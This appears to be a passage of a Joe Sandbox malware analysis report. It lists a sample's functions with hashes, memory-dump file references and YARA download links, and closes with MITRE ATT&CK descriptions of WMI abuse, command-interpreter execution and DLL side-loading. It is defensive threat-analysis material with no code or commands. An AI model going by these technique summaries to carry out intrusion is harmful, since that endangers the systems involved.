Instruction ID: 86cbb8547c37ed2a70575b00de21da0be12972fad41c08c0ae34aa832f4da520
Opcode Fuzzy Hash: b2bc5d50df9d97f630713bed552d7a33e764708b18c0bccbc1283e1ac165f4fa
Instruction Fuzzy Hash: 66313AB3F1162447F3184879CDA83A2A58397D4324F3F82798B6D677D5DCBE5C061284

Function 00F9400E Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911db83f0af0297c59e812d632667d8bcb7a05d1c8e51bf831c4ee7a7fe36e8a
Instruction ID: 532ce3a81145c93a2485cf9bd27f5b7517a0089869dfcf7f6d7a3985df433b18
Opcode Fuzzy Hash: 911db83f0af0297c59e812d632667d8bcb7a05d1c8e51bf831c4ee7a7fe36e8a
Instruction Fuzzy Hash: 48312BF7F516240BF3544829DD983A2258397E5324F2F82788F4CAB7C9D87D9D4A1384

Function 00F4D0F3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf150ca50f6bb727973dd75ef16194463ca48767ace02583a8b3c50886342a0
Instruction ID: 590bacec7400d530313c21d142cb483aec32c0317a6a86384d01a2de3acb40b0
Opcode Fuzzy Hash: 7cf150ca50f6bb727973dd75ef16194463ca48767ace02583a8b3c50886342a0
Instruction Fuzzy Hash: D531A1B3F5162107F3988879DC983A765839BD5324F2F82388E4D6B7C6DCBD1C0A1284

Function 00F690E3 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf04d86a652839a197f96990168489f598b8d716cbe55551bf65176d0870ed1
Instruction ID: 503fbb90ae42214d9b3578b1eeabf3cb06bd4b8d23eaed06339b00c9c8f44df1
Opcode Fuzzy Hash: aaf04d86a652839a197f96990168489f598b8d716cbe55551bf65176d0870ed1
Instruction Fuzzy Hash: 78317AB3F2291147F3940838CD593A26643A7E5321F3F83788A6D677C5CC7E990A1284

Function 01014341 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b65359a06fd11dba27eaaf2d4dbf3516e8007d683ede414e1e3f5443b03b6be
Instruction ID: 41d3d6870f26a4f42a740deeb4f502c222c24a797a6336da62f6bdad5760c7d6
Opcode Fuzzy Hash: 4b65359a06fd11dba27eaaf2d4dbf3516e8007d683ede414e1e3f5443b03b6be
Instruction Fuzzy Hash: D93183B3F2252647F3444D29CC683626243DBE1321F3F82788A595B7C9DD7E9C465784

Function 00F2C03E Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7af3aa5b3ed498ce6fdb163d28c9e4f4dae8bdec7090e0981e289119e6ae315c
Instruction ID: d3cea71e85c0321488340efa973ee6f7688178400310c839c8d1d2a8cf90d674
Opcode Fuzzy Hash: 7af3aa5b3ed498ce6fdb163d28c9e4f4dae8bdec7090e0981e289119e6ae315c
Instruction Fuzzy Hash: 373139F3F615214BF7148879CD583A669839BD1325F2F83388F19ABAC8DC7D8D4A5284

Function 00F7A241 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49ef5302d88c5b80593301ceeef6e55e4a961cccfb615a9c2f7a76e0309d9505
Instruction ID: 13822d01d79b162ce1c63230a03cd027a059eb6d7894743986d5422374f11466
Opcode Fuzzy Hash: 49ef5302d88c5b80593301ceeef6e55e4a961cccfb615a9c2f7a76e0309d9505
Instruction Fuzzy Hash: 713157F7F21A2147F3544865DC94392618397E5325F3F82388F2CAB7C6E9BE5C065288

Function 0105424A Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca57bfed85d9df914a3f9078bfa5b731acb6c83c227dc9c7f8f72347797b704
Instruction ID: 2d5e30bf036b1e982a844afe45d713a2d1c41d8d56b17cb667d3d7606612a817
Opcode Fuzzy Hash: fca57bfed85d9df914a3f9078bfa5b731acb6c83c227dc9c7f8f72347797b704
Instruction Fuzzy Hash: E221D0B3F116210BF3544865CC983526583ABD5329F2F82788F5C7BBC6D8BE9C4612C8

Function 00FA42E0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af61bc767babac8125bbddb67ed1a296b9bf41ea35ada5693102dc1cebceaf6
Instruction ID: c718ca8e847c82a987a959709217051320ce2021afd06ce98489a3486fb94783
Opcode Fuzzy Hash: 0af61bc767babac8125bbddb67ed1a296b9bf41ea35ada5693102dc1cebceaf6
Instruction Fuzzy Hash: F721AEB3F1252443F3444879CD58362A5439BE1325F2F82788F6C6B7C9DDBD5C0A0284

Function 00FC0236 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1940d62e08434ff173ada24b054ed74e68f268fd6d18c528b1334f7b59bf71
Instruction ID: 4436911f741f207a7a583e1757154be87a8217bcd4ddd0f1f1a37636bb236a7d
Opcode Fuzzy Hash: 0a1940d62e08434ff173ada24b054ed74e68f268fd6d18c528b1334f7b59bf71
Instruction Fuzzy Hash: B8215CF3E1192147F35804B8CD593A2A582DBA5324F2F42398F5ABB7C5DC7E5D451284

Function 00EF45F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 91e59e6df6310d97918be05fead99500dc0cdebdff08c24389307b6afaa7a839
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 6911EC737051D80EC7158D3C8400576BF930A93634B5A9399F4B5E72D6D6328D8A8354

Function 00EEA060 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction ID: 2146bd80c64afe9800e8113d5405864c7abf62d1c7b188368a9158169e6431e1
Opcode Fuzzy Hash: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction Fuzzy Hash: D901B1F570074547EB30AE5296C1B27B2E96F80708F1D643CE81467242DB76FD098292

Function 00EEB3DE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a538f017c70d92fffd46d1bf4752424feab987241fc0e58287a6fec5e95376
Instruction ID: 2c997c26b83af0f61bb8d8c4ed1330bdd55c309c72c5d48130c6da5ed4f68e1a
Opcode Fuzzy Hash: 73a538f017c70d92fffd46d1bf4752424feab987241fc0e58287a6fec5e95376
Instruction Fuzzy Hash: E4F0B4299896C745C319CB3E8070373FBE18F77354F2C6568C4E2673C2E76688099B14

Function 00EEB475 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae0e83c7fb2db819cdcb6b3e3c449d70121e4dd32277e4a0a38a769ef58aaa3
Instruction ID: c4ef89b63f130a910fcbcaf9d1a935766cfe30ab17d26b65d13fe0ac3cc39bd0
Opcode Fuzzy Hash: aae0e83c7fb2db819cdcb6b3e3c449d70121e4dd32277e4a0a38a769ef58aaa3
Instruction Fuzzy Hash: 76D022789048049BC208DB10EF2297AF2A9AF87696F10302CE403FB303CE61E860890A

Function 00ECC274 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe150ecb8ba5e227d3785fd7a23f5b0726a2e9c09db9214e0e8e607f301619e
Instruction ID: 9441db4648e28a11e92b0526a4a3e45a2684c7e9d98dd08076fd19a1f9410592
Opcode Fuzzy Hash: dfe150ecb8ba5e227d3785fd7a23f5b0726a2e9c09db9214e0e8e607f301619e
Instruction Fuzzy Hash: 77D0122094A29D4AC3468F3C9CA5731B7B1FB03100F54254DC142DB291C7D090169669

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
